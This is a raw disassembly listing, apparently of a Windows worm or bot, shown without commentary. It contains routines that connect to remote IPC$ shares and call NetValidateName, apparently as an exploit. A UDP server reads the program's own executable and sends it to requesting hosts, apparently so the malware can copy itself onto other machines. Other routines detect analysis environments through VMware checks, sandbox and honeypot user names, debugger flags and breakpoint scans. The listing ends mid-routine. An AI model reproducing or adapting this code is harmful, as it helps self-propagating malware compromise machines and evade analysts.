loc_409AB0: ; CODE XREF: sub_40978A+31F�j
inc eax
inc eax
loc_409AB2: ; CODE XREF: sub_40978A+324�j
push eax
mov [ebp+arg_0], eax
call sub_4296E8
mov esi, eax
pop ecx
cmp esi, ebx
mov [ebp+var_C], esi
jz short loc_409A4A
push [ebp+arg_0]
push ebx
push esi
call sub_429690
push 4
push offset dword_43EFBC
push esi
call sub_429350
lea eax, [ebp+var_CC48]
push eax
call sub_42A937
inc eax
mov [esi+8], ebx
mov [esi+0Ch], eax
mov [esi+4], eax
lea eax, [ebp+var_CC48]
push eax
lea eax, [esi+10h]
push eax
call sub_429B69
lea eax, [ebp+var_CC48]
push eax
call sub_42A937
lea eax, [eax+eax+12h]
add esp, 28h
test al, 3
mov [ebp+var_8], eax
jz short loc_409B24
loc_409B1C: ; CODE XREF: sub_40978A+395�j
inc eax
test al, 3
jnz short loc_409B1C
mov [ebp+var_8], eax
loc_409B24: ; CODE XREF: sub_40978A+390�j
cmp byte ptr (loc_43F017+1)[edi], bl
jz short loc_409B42
push 4
add eax, esi
push offset dword_43EFC4
push eax
call sub_429350
add esp, 0Ch
add [ebp+var_8], 4
loc_409B42: ; CODE XREF: sub_40978A+3A0�j
lea eax, [ebp+var_2C48]
push eax
call sub_42A937
mov ecx, [ebp+var_8]
inc eax
mov [ecx+esi+8], eax
mov [ecx+esi+4], ebx
mov [ecx+esi], eax
add ecx, 0Ch
mov [ebp+var_8], ecx
lea eax, [ebp+var_2C48]
add ecx, esi
push eax
push ecx
call sub_429B69
lea eax, [ebp+var_2C48]
push eax
call sub_42A937
mov ecx, [ebp+var_8]
add esp, 10h
lea eax, [ecx+eax*2+2]
test al, 3
mov [ebp+var_8], eax
jz short loc_409B97
loc_409B8F: ; CODE XREF: sub_40978A+408�j
inc eax
test al, 3
jnz short loc_409B8F
mov [ebp+var_8], eax
loc_409B97: ; CODE XREF: sub_40978A+403�j
push 8
add eax, esi
push ebx
push eax
call sub_429690
mov eax, [ebp+var_8]
add esp, 0Ch
add eax, 8
cmp byte ptr (loc_43F017+1)[edi], bl
jz short loc_409BB8
mov [eax+esi], ebx
jmp short loc_409BBE
; ---------------------------------------------------------------------------
loc_409BB8: ; CODE XREF: sub_40978A+427�j
mov word ptr [eax+esi], 1
loc_409BBE: ; CODE XREF: sub_40978A+42C�j
push 18h
lea eax, [ebp+var_24]
push ebx
push eax
call sub_429690
xor eax, eax
add esp, 0Ch
inc eax
xor ecx, ecx
cmp byte ptr (loc_43F017+1)[edi], bl
push eax
push 10B8h
mov [ebp+var_24], 5
push [ebp+arg_0]
mov [ebp+var_23], bl
setnz cl
push esi
lea esi, [ebp+var_24]
sub esp, 18h
lea ecx, [ecx+ecx+19h]
mov [ebp+var_E], cx
mov [ebp+var_22], bl
push 6
mov [ebp+var_21], 3
pop ecx
mov [ebp+var_20], 10h
mov edi, esp
push [ebp+var_4]
mov [ebp+var_1A], bx
mov [ebp+var_18], eax
mov [ebp+var_10], bx
rep movsd
call sub_4096AB
add esp, 2Ch
test eax, eax
push [ebp+var_4]
jnz short loc_409C4D
call dword_437044 ; CloseHandle
push [ebp+var_C]
call sub_429822
pop ecx
loc_409C3B: ; CODE XREF: sub_40978A+22D�j
; sub_40978A+2C9�j
push ebx
push ebx
push [ebp+var_7C]
call dword_456F90
loc_409C46: ; CODE XREF: sub_40978A+38�j
; sub_40978A+4A�j
xor eax, eax
jmp loc_409D29
; ---------------------------------------------------------------------------
loc_409C4D: ; CODE XREF: sub_40978A+4A0�j
call dword_437044 ; CloseHandle
push [ebp+var_C]
call sub_429822
pop ecx
push ebx
push ebx
push [ebp+var_7C]
call dword_456F90
push 7D0h
call dword_43718C ; Sleep
movzx eax, word_443986
push eax
lea esi, [ebp+arg_4]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
add esp, 0C8h
test eax, eax
jz loc_409D26
mov edx, [ebp+arg_B0]
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov eax, edx
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
shl eax, 6
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+arg_C0], ebx
mov ecx, [ecx]
jz short loc_409CF4
cmp [ebp+arg_B8], ebx
jnz short loc_409CFC
push ecx
lea ecx, [ebp+arg_4]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push [ebp+arg_C8]
push [ebp+arg_CC]
call sub_41CD84
mov edx, [ebp+arg_B0]
add esp, 1Ch
loc_409CF4: ; CODE XREF: sub_40978A+538�j
cmp [ebp+arg_B8], ebx
jz short loc_409D26
loc_409CFC: ; CODE XREF: sub_40978A+540�j
shl edx, 6
lea eax, [ebp+arg_4]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push [ebp+arg_C8]
push [ebp+arg_CC]
call sub_41CD0E
add esp, 1Ch
loc_409D26: ; CODE XREF: sub_40978A+50D�j
; sub_40978A+570�j
xor eax, eax
inc eax
loc_409D29: ; CODE XREF: sub_40978A+4BE�j
pop edi
pop esi
pop ebx
leave
retn
sub_40978A endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ecx
push ebx
xor ebx, ebx
push esi
inc ebx
push edi
lea eax, [ebp+10h]
push ebx
push eax
call sub_4044F6
pop ecx
cmp eax, 3
pop ecx
jnz short loc_409D9B
push dword ptr [ebp+0Ch]
lea esi, [ebp+10h]
push dword ptr [ebp+8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
push ebx
rep movsd
call sub_40978A
add esp, 0D0h
lea esi, [ebp+10h]
mov [ebp-4], eax
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
push ebx
rep movsd
call sub_40978A
add esp, 0D0h
test eax, eax
jnz short loc_409DC1
cmp [ebp-4], eax
jnz short loc_409DC1
jmp short loc_409DC3
; ---------------------------------------------------------------------------
loc_409D9B: ; CODE XREF: .text:00409D47�j
cmp eax, 2
jnz short loc_409DC1
sub esp, 0C4h
lea esi, [ebp+10h]
push 31h
pop ecx
mov edi, esp
push dword ptr [ebp+0Ch]
rep movsd
push dword ptr [ebp+8]
call sub_409F99
add esp, 0CCh
loc_409DC1: ; CODE XREF: .text:00409D92�j
; .text:00409D97�j ...
mov eax, ebx
loc_409DC3: ; CODE XREF: .text:00409D99�j
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push esi
push edi
lea eax, [ebp+10h]
push 1
push eax
call sub_4044F6
pop ecx
cmp eax, 3
pop ecx
jnz loc_409E85
mov ebx, [ebp+0Ch]
lea esi, [ebp+10h]
push ebx
push dword ptr [ebp+8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
push 0
rep movsd
call sub_40978A
add esp, 0D0h
lea esi, [ebp+10h]
mov [ebp+0Ch], eax
push ebx
push dword ptr [ebp+8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
push 0
rep movsd
call sub_40978A
add esp, 0D0h
test eax, eax
jnz short loc_409E59
cmp [ebp+0Ch], eax
jnz short loc_409E59
push ebx
lea esi, [ebp+10h]
push dword ptr [ebp+8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
push 2
rep movsd
call sub_40978A
add esp, 0D0h
mov [ebp+0Ch], eax
loc_409E59: ; CODE XREF: .text:00409E2E�j
; .text:00409E33�j
push ebx
lea esi, [ebp+10h]
push dword ptr [ebp+8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
push 2
rep movsd
call sub_40978A
add esp, 0D0h
test eax, eax
jnz short loc_409EAB
cmp [ebp+0Ch], eax
jnz short loc_409EAB
jmp short loc_409EAE
; ---------------------------------------------------------------------------
loc_409E85: ; CODE XREF: .text:00409DDE�j
cmp eax, 2
jnz short loc_409EAB
sub esp, 0C4h
lea esi, [ebp+10h]
push 31h
pop ecx
mov edi, esp
push dword ptr [ebp+0Ch]
rep movsd
push dword ptr [ebp+8]
call sub_409F99
add esp, 0CCh
loc_409EAB: ; CODE XREF: .text:00409E7C�j
; .text:00409E81�j ...
xor eax, eax
inc eax
loc_409EAE: ; CODE XREF: .text:00409E83�j
pop edi
pop esi
pop ebx
pop ebp
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409EB3 proc near ; DATA XREF: sub_409F80+6�o
var_220 = byte ptr -220h
var_120 = byte ptr -120h
var_A0 = byte ptr -0A0h
var_20 = byte ptr -20h
var_1C = dword ptr -1Ch
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 220h
push edi
push offset aNetapi32_dll ; "netapi32.dll"
call dword_437034 ; LoadLibraryA
push offset aNetvalidatenam ; "NetValidateName"
push eax
mov dword_4557C0, eax
call dword_437030 ; GetProcAddress
xor edi, edi
mov dword_4557B4, eax
cmp eax, edi
jz loc_409F7D
push esi
mov esi, 80h
push [ebp+arg_0]
lea eax, [ebp+var_120]
push offset aSIpc_0 ; "\\\\%s\\IPC$"
push esi
push eax
call sub_429AEE
push [ebp+arg_0]
lea eax, [ebp+var_A0]
push offset aS_0 ; "\\\\%s"
push esi
push eax
call sub_429AEE
add esp, 20h
lea eax, [ebp+var_220]
push esi
push eax
lea eax, [ebp+var_A0]
push eax
call sub_4292D0
pop ecx
inc eax
push eax
lea eax, [ebp+var_A0]
push eax
push edi
push edi
call dword_437180 ; MultiByteToWideChar
lea eax, [ebp+var_120]
push edi
mov [ebp+var_C], eax
mov eax, offset byte_454A34
push eax
push eax
lea eax, [ebp+var_20]
mov [ebp+var_10], edi
push eax
mov [ebp+var_4], edi
mov [ebp+var_1C], edi
call sub_428FFA
push edi
push edi
push edi
lea eax, [ebp+var_220]
push offset byte_4557C8
push eax
call dword_4557B4
add esp, 14h
pop esi
loc_409F7D: ; CODE XREF: sub_409EB3+2F�j
pop edi
leave
retn
sub_409EB3 endp
; =============== S U B R O U T I N E =======================================
sub_409F80 proc near ; CODE XREF: sub_409F99+E6�p
arg_0 = dword ptr 4
push [esp+arg_0]
push 0
push offset sub_409EB3
call sub_42AAB1
add esp, 0Ch
mov dword_4557B8, eax
retn
sub_409F80 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_409F99 proc near ; CODE XREF: .text:00409DB6�p
; .text:00409EA0�p
var_190 = byte ptr -190h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
arg_B4 = dword ptr 0BCh
arg_BC = dword ptr 0C4h
arg_C4 = dword ptr 0CCh
push ebp
mov ebp, esp
sub esp, 190h
push esi
push edi
lea eax, [ebp+arg_8]
push 1
push eax
call sub_4044F6
pop ecx
test eax, eax
pop ecx
lea eax, [ebp+arg_8]
jz short loc_409FBC
push 1
jmp short loc_409FBE
; ---------------------------------------------------------------------------
loc_409FBC: ; CODE XREF: sub_409F99+1D�j
push 5
loc_409FBE: ; CODE XREF: sub_409F99+21�j
push eax
call sub_4044F6
pop ecx
mov esi, eax
pop ecx
lea eax, [ebp+arg_8]
push eax
call dword_4372BC ; inet_addr
cmp esi, 9
jz short loc_40A056
push 5
cmp esi, 3
pop eax
jnz short loc_409FE2
push 4
pop eax
loc_409FE2: ; CODE XREF: sub_409F99+44�j
cmp esi, 2
jnz short loc_409FEA
xor eax, eax
inc eax
loc_409FEA: ; CODE XREF: sub_409F99+4C�j
mov edi, dword_43F048[eax*4]
mov esi, 0A28h
push esi
push 90h
push offset byte_4557C8
call sub_429690
mov eax, edi
mov ecx, 1FBh
mov edi, offset byte_4557C9
add esp, 0Ch
rep stosd
lea eax, [ebp+var_190]
push eax
push 101h
call dword_4372B4 ; WSAStartup
test eax, eax
jnz short loc_40A056
push 6
push 1
push 2
call dword_4372B8 ; socket
mov ax, word_443986
push eax
call dword_4372C0 ; ntohs
mov ecx, dword_43F060
lea eax, [ecx+7FEh]
cmp eax, esi
jle short loc_40A05D
loc_40A056: ; CODE XREF: sub_409F99+3C�j
; sub_409F99+92�j
xor eax, eax
jmp loc_40A14B
; ---------------------------------------------------------------------------
loc_40A05D: ; CODE XREF: sub_409F99+BB�j
test ecx, ecx
jle short loc_40A079
mov eax, ecx
mov esi, offset dword_43A8E8
mov edi, offset word_455FC6
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
loc_40A079: ; CODE XREF: sub_409F99+C6�j
lea eax, [ebp+arg_8]
push 14h
push eax
call sub_409F80
pop ecx
pop ecx
push 7D0h
call dword_43718C ; Sleep
movzx eax, word_443986
push eax
lea esi, [ebp+arg_8]
sub esp, 0C4h
push 31h
pop ecx
mov edi, esp
rep movsd
call sub_401B6E
add esp, 0C8h
test eax, eax
jz loc_40A13E
mov edx, [ebp+arg_B4]
mov edi, offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
mov eax, edx
mov esi, offset aSSSExD ; "%s %s -> %s (Ex: %d)"
shl eax, 6
lea ecx, dword_43A380[eax]
inc dword ptr [ecx]
cmp [ebp+arg_C4], 0
mov ecx, [ecx]
jz short loc_40A10F
cmp [ebp+arg_BC], 0
jnz short loc_40A118
push ecx
lea ecx, [ebp+arg_8]
lea eax, dword_43A357[eax]
push ecx
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD84
mov edx, [ebp+arg_B4]
add esp, 1Ch
loc_40A10F: ; CODE XREF: sub_409F99+149�j
cmp [ebp+arg_BC], 0
jz short loc_40A148
loc_40A118: ; CODE XREF: sub_409F99+152�j
shl edx, 6
lea eax, [ebp+arg_8]
push dword_43A380[edx]
push eax
lea eax, dword_43A357[edx]
push eax
push edi
push esi
push [ebp+arg_0]
push [ebp+arg_4]
call sub_41CD0E
add esp, 1Ch
jmp short loc_40A148
; ---------------------------------------------------------------------------
loc_40A13E: ; CODE XREF: sub_409F99+11D�j
lea eax, [ebp+arg_8]
push eax
call sub_401E8E
pop ecx
loc_40A148: ; CODE XREF: sub_409F99+17D�j
; sub_409F99+1A3�j
xor eax, eax
inc eax
loc_40A14B: ; CODE XREF: sub_409F99+BF�j
pop edi
pop esi
leave
retn
sub_409F99 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A14F proc near ; CODE XREF: .text:0040A233�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 10h
push [ebp+arg_4]
mov [ebp+var_10], 2
call dword_456F18 ; ntohs
mov [ebp+var_E], ax
and [ebp+var_C], 0
lea eax, [ebp+arg_4]
push 4
push eax
push 4
push 0FFFFh
mov [ebp+arg_4], 1
push [ebp+arg_0]
call dword_456EF0 ; setsockopt
test eax, eax
jnz short loc_40A1B7
lea eax, [ebp+var_10]
push 10h
push eax
push [ebp+arg_0]
call dword_456F4C ; bind
cmp eax, 0FFFFFFFFh
jz short loc_40A1B7
cmp [ebp+arg_8], 0
jnz short loc_40A1BB
push 0Ah
push [ebp+arg_0]
call dword_456F48 ; listen
cmp eax, 0FFFFFFFFh
jnz short loc_40A1BB
loc_40A1B7: ; CODE XREF: sub_40A14F+3C�j
; sub_40A14F+50�j
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40A1BB: ; CODE XREF: sub_40A14F+56�j
; sub_40A14F+66�j
xor eax, eax
inc eax
leave
retn
sub_40A14F endp
; ---------------------------------------------------------------------------
loc_40A1C0: ; DATA XREF: sub_40A938+6884�o
push ebp
mov ebp, esp
sub esp, 604h
mov eax, [ebp+8]
push ebx
push esi
push edi
push 31h
mov esi, eax
pop ecx
lea edi, [ebp-0F4h]
rep movsd
xor edi, edi
xor ebx, ebx
inc edi
push ebx
mov [eax+0BCh], edi
mov eax, [ebp-0F4h]
push 2
push 2
mov [ebp-8], eax
call dword_456FB0 ; socket
push 0Bh
mov esi, eax
call sub_423756
imul eax, 2724h
cmp esi, ebx
pop ecx
mov dword_46D710[eax], esi
jnz short loc_40A21C
push ebx
call dword_437170 ; ExitThread
loc_40A21C: ; CODE XREF: .text:0040A213�j
push edi
push 45h
push 0Bh
call sub_423756
imul eax, 2724h
pop ecx
push dword_46D710[eax]
call sub_40A14F
add esp, 0Ch
test eax, eax
jnz short loc_40A246
push ebx
call dword_437170 ; ExitThread
loc_40A246: ; CODE XREF: .text:0040A23D�j
lea eax, [ebp-604h]
push 104h
push eax
push ebx
call dword_437178 ; GetModuleFileNameA
test eax, eax
jz loc_40A4DE
lea eax, [ebp-604h]
push offset aRb ; "rb"
push eax
call sub_42A43C
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+8], eax
jz loc_40A4DE
mov esi, 200h
loc_40A284: ; CODE XREF: .text:0040A2E4�j
; .text:0040A3BF�j ...
push 0Bh
mov dword ptr [ebp-10h], 5
mov dword ptr [ebp-0Ch], 1388h
mov [ebp-500h], ebx
call sub_423756
imul eax, 2724h
inc dword ptr [ebp-500h]
mov dword ptr [esp], 104h
mov eax, dword_46D710[eax]
push ebx
mov [ebp-4FCh], eax
lea eax, [ebp-3FCh]
push eax
call sub_429690
add esp, 0Ch
lea eax, [ebp-10h]
push eax
push ebx
lea eax, [ebp-500h]
push ebx
push eax
push ebx
call dword_456EFC ; select
test eax, eax
jz short loc_40A284
push 10h
lea eax, [ebp-4]
pop edi
push eax
lea eax, [ebp-20h]
push eax
push ebx
lea eax, [ebp-3FCh]
push 104h
push eax
push 0Bh
mov [ebp-4], edi
call sub_423756
imul eax, 2724h
pop ecx
push dword_46D710[eax]
call dword_456EE4 ; recvfrom
test eax, eax
jz loc_40A4D7
push dword ptr [ebp-1Ch]
call dword_456FBC ; inet_ntoa
push eax
lea eax, [ebp-30h]
push edi
push eax
call sub_429AEE
add esp, 0Ch
cmp [ebp-3FCh], bl
jnz loc_40A4C3
cmp byte ptr [ebp-3FBh], 1
jnz short loc_40A3C4
push offset dword_443990
call sub_4292D0
push ebx
push ebx
push dword ptr [ebp+8]
call sub_42A352
push dword ptr [ebp+8]
lea eax, [ebp-2F4h]
mov [ebp-2F8h], bl
mov byte ptr [ebp-2F7h], 3
push esi
push 1
push eax
mov [ebp-2F6h], bl
mov byte ptr [ebp-2F5h], 1
call sub_42A0B8
add esp, 20h
lea ecx, [ebp-20h]
add eax, 4
push dword ptr [ebp-4]
push ecx
push ebx
push eax
lea eax, [ebp-2F8h]
push eax
loc_40A3A5: ; CODE XREF: .text:0040A4D2�j
push 0Bh
call sub_423756
imul eax, 2724h
pop ecx
push dword_46D710[eax]
call dword_456F8C ; sendto
jmp loc_40A284
; ---------------------------------------------------------------------------
loc_40A3C4: ; CODE XREF: .text:0040A34D�j
cmp byte ptr [ebp-3FBh], 4
jnz loc_40A4C3
mov cl, [ebp-3F9h]
mov al, [ebp-3FAh]
cmp cl, 0FFh
mov [ebp-2F8h], bl
mov byte ptr [ebp-2F7h], 3
jnz short loc_40A3FB
inc al
xor cl, cl
mov [ebp-2F5h], bl
jmp short loc_40A403
; ---------------------------------------------------------------------------
loc_40A3FB: ; CODE XREF: .text:0040A3ED�j
inc cl
mov [ebp-2F5h], cl
loc_40A403: ; CODE XREF: .text:0040A3F9�j
mov [ebp-2F6h], al
push ebx
movzx eax, al
movzx ecx, cl
shl eax, 8
add eax, ecx
shl eax, 9
sub eax, esi
push eax
push dword ptr [ebp+8]
call sub_42A352
push dword ptr [ebp+8]
lea eax, [ebp-2F4h]
push esi
push 1
push eax
call sub_42A0B8
add esp, 1Ch
mov edi, eax
lea eax, [ebp-20h]
push dword ptr [ebp-4]
push eax
lea eax, [edi+4]
push ebx
push eax
lea eax, [ebp-2F8h]
push eax
push 0Bh
call sub_423756
imul eax, 2724h
pop ecx
push dword_46D710[eax]
call dword_456F8C ; sendto
cmp edi, ebx
jnz short loc_40A495
cmp [ebp-44h], ebx
jz short loc_40A495
cmp [ebp-3Ch], ebx
jnz short loc_40A49E
lea eax, [ebp-30h]
push eax
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
lea eax, [ebp-0F0h]
push offset dword_43F0B0
push eax
push dword ptr [ebp-8]
call sub_41CD84
add esp, 14h
loc_40A495: ; CODE XREF: .text:0040A469�j
; .text:0040A46E�j
cmp [ebp-3Ch], ebx
jz loc_40A284
loc_40A49E: ; CODE XREF: .text:0040A473�j
lea eax, [ebp-30h]
push eax
push offset aWpukb_0uioaOfu ; "WPUkb.0uIoa/OFUur11TNYw0"
lea eax, [ebp-0F0h]
push offset dword_43F0B0
push eax
push dword ptr [ebp-8]
call sub_41CD0E
add esp, 14h
jmp loc_40A284
; ---------------------------------------------------------------------------
loc_40A4C3: ; CODE XREF: .text:0040A340�j
; .text:0040A3CB�j
push dword ptr [ebp-4]
lea eax, [ebp-20h]
push eax
push ebx
push 9
push offset dword_43F0A4
jmp loc_40A3A5
; ---------------------------------------------------------------------------
loc_40A4D7: ; CODE XREF: .text:0040A31D�j
push ebx
call dword_437170 ; ExitThread
loc_40A4DE: ; CODE XREF: .text:0040A25B�j
; .text:0040A279�j
push ebx
call dword_437170 ; ExitThread
loc_40A4E5: ; CODE XREF: sub_40A708+A1�p
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437308
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 14h
push ebx
push esi
push edi
mov [ebp-18h], esp
and byte ptr [ebp-19h], 0
and dword ptr [ebp-4], 0
push ebx
mov ebx, 0
mov eax, 1
; ---------------------------------------------------------------------------
dw 3F0Fh
dd 0DB850B07h, 0E745940Fh, 8B34EB5Bh, 4589EC45h, 0E0458BE0h
dd 8904408Bh, 4D8BDC45h, 0FFC883DCh, 0A48189h, 4D8B0000h
dd 0B8898BDCh, 83000000h, 558B04C1h, 0B88A89DCh, 0C3000000h
dd 83E8658Bh, 8AFFFC4Dh, 4D8BE745h, 0D8964F0h, 0
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
leave
retn
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A575 proc near ; CODE XREF: sub_40A708+AA�p
var_19 = byte ptr -19h
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437318
push offset sub_42ACF4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_19], 1
and [ebp+var_4], 0
push edx
push ecx
push ebx
mov eax, 564D5868h
mov ebx, 0
mov ecx, 0Ah
mov edx, 5658h
in eax, dx
cmp ebx, 564D5868h
setz [ebp+var_19]
pop ebx
pop ecx
pop edx
jmp short loc_40A5D5
; ---------------------------------------------------------------------------
xor eax, eax
inc eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
and [ebp+var_19], 0
loc_40A5D5: ; CODE XREF: sub_40A575+53�j
or [ebp+var_4], 0FFFFFFFFh
mov al, [ebp+var_19]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_40A575 endp
; =============== S U B R O U T I N E =======================================
sub_40A5EB proc near ; CODE XREF: sub_40A708:loc_40A750�p
mov eax, large fs:30h
mov eax, [eax+0Ch]
mov eax, [eax+0Ch]
add dword ptr [eax+20h], 2000h
retn
sub_40A5EB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A5FF proc near ; CODE XREF: sub_40A708+B3�p
var_104 = byte ptr -104h
push ebp
mov ebp, esp
sub esp, 104h
lea eax, [ebp+var_104]
push 104h
push eax
push 0
call dword_437178 ; GetModuleFileNameA
lea eax, [ebp+var_104]
push offset dword_43F0C0
push eax
call sub_42ADD0
pop ecx
xor eax, eax
pop ecx
leave
retn
sub_40A5FF endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A633 proc near ; CODE XREF: sub_40A708+BC�p
var_134 = byte ptr -134h
var_B4 = byte ptr -0B4h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 134h
push esi
lea eax, [ebp+var_4]
push edi
push eax
lea eax, [ebp+var_B4]
mov esi, offset aTu4nh09smcg1hc ; "TU-4NH09SMCG1HC"
push eax
mov [ebp+var_34], esi
mov [ebp+var_30], offset aRoo ; "roo"
mov [ebp+var_2C], offset aSandbox ; "Sandbox"
mov [ebp+var_28], offset aSnort ; "snort"
mov [ebp+var_24], offset aHoney ; "honey"
mov [ebp+var_20], offset aHoneyc ; "honeyc"
mov [ebp+var_1C], offset aHoneyd ; "honeyd"
mov [ebp+var_18], offset aHoneymule ; "HoneyMule"
mov [ebp+var_14], offset aVmware ; "vmware"
mov [ebp+var_10], offset aCurrentuser ; "currentuser"
mov [ebp+var_C], offset aNepenthes ; "nepenthes"
mov [ebp+var_8], offset aImail8_001531N ; "(IMail 8.00 153-1) NT-ESMTP Server X1"
mov [ebp+var_4], 80h
call dword_43700C ; GetUserNameA
lea eax, [ebp+var_B4]
push eax
call dword_437268 ; CharLowerA
xor edi, edi
loc_40A6BA: ; CODE XREF: sub_40A633+A1�j
push [ebp+edi*4+var_34]
lea eax, [ebp+var_B4]
push eax
call sub_42ADD0
pop ecx
test eax, eax
pop ecx
jnz short loc_40A6FD
inc edi
cmp edi, 0Ch
jb short loc_40A6BA
lea eax, [ebp+var_4]
push eax
lea eax, [ebp+var_134]
push eax
call dword_43709C ; GetComputerNameA
test eax, eax
jz short loc_40A702
lea eax, [ebp+var_134]
push esi
push eax
call dword_437174 ; lstrcmpiA
test eax, eax
jnz short loc_40A702
loc_40A6FD: ; CODE XREF: sub_40A633+9B�j
xor eax, eax
inc eax
jmp short loc_40A704
; ---------------------------------------------------------------------------
loc_40A702: ; CODE XREF: sub_40A633+B6�j
; sub_40A633+C8�j
xor eax, eax
loc_40A704: ; CODE XREF: sub_40A633+CD�j
pop edi
pop esi
leave
retn
sub_40A633 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40A708 proc near ; CODE XREF: sub_418D49+F�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
cmp dword_4561F0, 0
push ebx
push esi
push edi
jz short loc_40A722
xor eax, eax
inc eax
jmp loc_40A851
; ---------------------------------------------------------------------------
loc_40A722: ; CODE XREF: sub_40A708+10�j
and [ebp+var_4], 0
mov esi, offset aKernel32_dll ; "KERNEL32.DLL"
push esi
call dword_437070 ; GetModuleHandleA
test eax, eax
jnz short loc_40A741
push esi
call dword_437034 ; LoadLibraryA
test eax, eax
jz short loc_40A750
loc_40A741: ; CODE XREF: sub_40A708+2C�j
push offset aIsdebuggerpres ; "IsDebuggerPresent"
push eax
call dword_437030 ; GetProcAddress
mov [ebp+var_4], eax
loc_40A750: ; CODE XREF: sub_40A708+37�j
call sub_40A5EB
call dword_437184 ; GetTickCount
mov [ebp+var_C], eax
mov esi, offset sub_40A856
mov al, [esi]
cmp al, 0CCh
jz short loc_40A76D
xor eax, eax
jmp short loc_40A772
; ---------------------------------------------------------------------------
loc_40A76D: ; CODE XREF: sub_40A708+5F�j
mov eax, 1
loc_40A772: ; CODE XREF: sub_40A708+63�j
test al, al
jz short loc_40A77E
loc_40A776: ; CODE XREF: sub_40A708+9F�j
; sub_40A708+A8�j ...
xor edi, edi
inc edi
jmp loc_40A845
; ---------------------------------------------------------------------------
loc_40A77E: ; CODE XREF: sub_40A708+6C�j
mov [ebp+var_8], offset aDaemon ; "DAEMON"
push 0
push [ebp+var_8]
mov eax, large fs:30h
movzx eax, byte ptr [eax+2]
or al, al
jz short loc_40A79A
jmp short loc_40A79E
; ---------------------------------------------------------------------------
loc_40A79A: ; CODE XREF: sub_40A708+8E�j
xor eax, eax
leave
retn
; ---------------------------------------------------------------------------
loc_40A79E: ; CODE XREF: sub_40A708+90�j
mov eax, 1
leave
retn
; ---------------------------------------------------------------------------
test al, al
jnz short loc_40A776
call loc_40A4E5
test al, al
jnz short loc_40A776
call sub_40A575
test al, al
jnz short loc_40A776
call sub_40A5FF
test eax, eax
jnz short loc_40A776
call sub_40A633
xor edi, edi
inc edi
test eax, eax
jnz short loc_40A845
push edi
mov ebx, offset aSoftwareVmware ; "SOFTWARE\\VMware, Inc.\\VMware Tools"
push offset aInstallpath ; "InstallPath"
mov esi, 80000002h
push ebx
push esi
call sub_420FC9
add esp, 10h
test eax, eax
jnz short loc_40A845
push 4
push offset aShowtray ; "ShowTray"
push ebx
push esi
call sub_420FC9
add esp, 10h
test eax, eax
jnz short loc_40A845
cmp [ebp+var_4], eax
jz short loc_40A835
lea eax, [ebp+var_4]
mov [ebp+var_8], eax
mov esi, [ebp+var_8]
mov al, [esi]
cmp al, 0CCh
jz short loc_40A81B
xor eax, eax
jmp short loc_40A820
; ---------------------------------------------------------------------------
loc_40A81B: ; CODE XREF: sub_40A708+10D�j
mov eax, 1
loc_40A820: ; CODE XREF: sub_40A708+111�j
test al, al
jnz short loc_40A845
call [ebp+var_4]
test eax, eax
jnz short loc_40A845
call dword_4370A0 ; IsDebuggerPresent
test eax, eax
jnz short loc_40A845
loc_40A835: ; CODE XREF: sub_40A708+FE�j
